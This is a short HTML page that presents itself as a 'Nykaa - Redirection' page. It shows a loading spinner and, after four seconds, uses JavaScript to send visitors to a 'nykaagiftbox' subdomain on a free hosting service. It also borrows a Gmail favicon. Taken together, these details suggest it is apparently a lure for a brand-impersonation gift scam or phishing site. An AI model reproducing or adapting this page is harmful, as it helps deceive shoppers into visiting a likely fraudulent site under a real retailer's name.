
      
<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta charset="utf-8">
  <meta content="width=300, initial-scale=1" name="viewport">
  <meta name="jingle" value="notranslate">
  <meta name="description" content=".">
  <title>Nykaa - Redirection...</title>
  <link rel="shortcut icon" href="https://ssl.gstatic.com/ui/v1/icons/mail/images/favicon5.ico" type="image/x-icon">
  <style>
  body{
    background: #eee;
  }
  #wrapper{
    display: inline-block;
    position: absolute;
    top: 30%;
    width:260px;
    left:0;
    right:0;
    margin:auto;
    font-family: monospace;
  }
.loader {
  position: relative;
  left: 30%;
  border: 14px solid white;
  border-radius: 50%;
  border-top: 14px solid #3498db;
  width: 70px;
  height: 70px;
  -webkit-animation: spin 2s linear infinite; /* Safari */
  animation: spin 2s linear infinite;
}

/* Safari */
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(0deg); }
  100% { -webkit-transform: rotate(360deg); }
}

@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}
</style>
</head>
<body>

<div id="wrapper">
<h4>Please wait while you are redirected</h4>

<div class="loader"></div>
</div>

<script type="text/javascript">
  setTimeout(function(){
            window.location.href = 'http://nykaagiftbox.000webhostapp.com/';
         }, 4000);
</script>


  
</body>
</html>
